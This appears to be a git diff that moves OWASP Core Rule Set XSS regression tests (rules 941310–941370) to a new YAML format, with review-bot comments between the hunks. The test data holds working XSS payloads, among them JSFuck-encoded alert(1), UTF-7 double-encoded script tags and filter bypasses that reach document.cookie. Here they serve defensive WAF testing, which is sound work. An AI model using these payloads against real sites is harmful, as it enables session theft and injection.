agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbe\xbe + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 8 desc: Negative for missing end tag, opening tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 9 desc: Negative for missing end tag, closing tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: 
"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 10 desc: Negative using real world Russian example in utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнпрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнпрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 11 desc: Negative using real world Russian 
example in utf-8, variant stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклнопрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 12 desc: "Status Page Test - US-ASCII Malformed Encoding XSS Filter Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe
- version: "HTTP/1.1"
- output:
- log_contains: id "941310"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ Content-Type: "application/x-www-form-urlencoded"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [941310]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml
index ee155e7f6..65c280f54 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml
@@ -1,24 +1,22 @@
---
meta:
author: "Christian S.J. Peron, azurit"
- description: None
- enabled: true
- name: 941320.yaml
+rule_id: 941320
tests:
- - test_title: 941320-1
+ - test_id: 1
desc: "XSS Attack - HTML Tag Handler"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=\">"
- output:
- log_contains: id "941330"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ version: HTTP/1.0
+ data: "payload="
+ output:
+ log:
+ expect_ids: [941330]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml
index 214a6fed4..b75576c73 100644
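Review bot: Test 1 in 941320.yaml now declares `rule_id: 941320` at the top of the file but still asserts `expect_ids: [941330]`, and at the same time its payload is swapped from `data: "var=\">"` to `data: "payload="` while the desc "XSS Attack - HTML Tag Handler" is left as is. If the intent is that this request is expected to trigger the neighbouring rule 941330 rather than 941320, say so next to the assertion, e.g. `# this payload is expected to hit 941330, not 941320`; otherwise the id should be 941320 so the file tests the rule it is named after. The new `data` value reads as possibly truncated in this view, so confirm the rendered file carries the complete payload and that the desc still describes it.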
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml
@@ -1,41 +1,39 @@
---
meta:
author: "Christian S.J. Peron, azurit"
- description: None
- enabled: true
- name: 941340.yaml
+rule_id: 941340
tests:
- - test_title: 941340-1
+ - test_id: 1
desc: "IE XSS Filters - Attack"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=' infoo.bar=&var2=whatever"
- version: HTTP/1.0
- output:
- log_contains: id "941340"
- - test_title: 941340-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=' infoo.bar=&var2=whatever"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [941340]
+ - test_id: 2
desc: "XSS test based on portswigger XSS cheatsheet"
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "payload=XSS"
- version: HTTP/1.0
- output:
- log_contains: id "941340"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "payload=XSS"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [941340]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml
index 11cd1675f..97a14eb20 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml
@@ -1,23 +1,21 @@
---
meta:
author: "fgsch, azurit"
- enabled: true
- name: 941350.yaml
- description: Test rule 941350
+rule_id: 941350
tests:
- - test_title: 941350-1
+ - test_id: 1
desc: GH issue 1514
stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- method: GET
- port: 80
- uri: "/get/xx?id=%252bADw-script%252bAD4-"
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- version: "HTTP/1.1"
- output:
- log_contains: id "941350"
+ - input:
+ dest_addr: 127.0.0.1
+ method: GET
+ port: 80
+ uri: "/get/xx?id=%252bADw-script%252bAD4-"
+ headers:
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [941350]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml
index 218cf00ad..b94241cfa 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml
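Review bot: The only test in 941350.yaml keeps `desc: GH issue 1514`, which names a ticket but not what the request exercises, now that the `description: Test rule 941350` line is gone from meta. The other files migrated in this commit link the originating report in a comment next to the payload (`# Reported in https://github.com/coreruleset/coreruleset/issues/1942 ...` in 941310.yaml), so the same convention would fit here: a `# Reported in https://github.com/coreruleset/coreruleset/issues/1514` comment above `uri:` plus a desc that states the encoding under test, e.g. `desc: "GH issue 1514 - double URL-encoded UTF-7 payload in query string"` (the UTF-7 reading of `%252bADw-script%252bAD4-` is my inference; adjust if the issue describes it differently). The unquoted plain scalar is safe as written, but quoting the desc would keep it consistent with the other files in this hunk set.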
@@ -1,61 +1,59 @@ --- meta: author: "Christian Folini, azurit" - description: None - enabled: true - name: 941360.yaml +rule_id: 941360 tests: - - test_title: 941360-1 + - test_id: 1 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" - # Payload represents "alert(1)" in JSFuck encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - test_title: 941360-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" + # Payload represents "alert(1)" in JSFuck encoding + version: HTTP/1.1 + output: + log: + expect_ids: [941360] + - test_id: 2 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=(![]+[])[+!+[]]" - # Payload represents "a" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - test_title: 
941360-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=(![]+[])[+!+[]]" + # Payload represents "a" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log: + expect_ids: [941360] + - test_id: 3 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=+!![]" - # Payload represents "1" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=+!![]" + # Payload represents "1" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log: + expect_ids: [941360] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml index 405779515..ca9246a0a 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml 
@@ -1,177 +1,175 @@ --- meta: author: "Andrea Menin, azurit" - description: None - enabled: true - name: 941370.yaml +rule_id: 941370 tests: - - test_title: 941370-1 + - test_id: 1 desc: "Bypass using comment in syntax and multiple whitespaces" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 2 desc: "Bypass using comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 3 desc: "Bypass using JavaScript global variables" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 
"OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 4 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 5 desc: "Bypass using JavaScript global variables and string concatenation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 6 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 7 desc: "Bypass using JavaScript global variables and jQuery globalEval" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - 
method: POST - port: 80 - uri: "/post" - data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 8 desc: "Bypass using JavaScript global variables and hex escape sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%22%5Cx24%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%22%5Cx24%22%5D" + version: HTTP/1.1 + output: + log: + expect_ids: [941370] + - test_id: 9 desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=%28document%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 
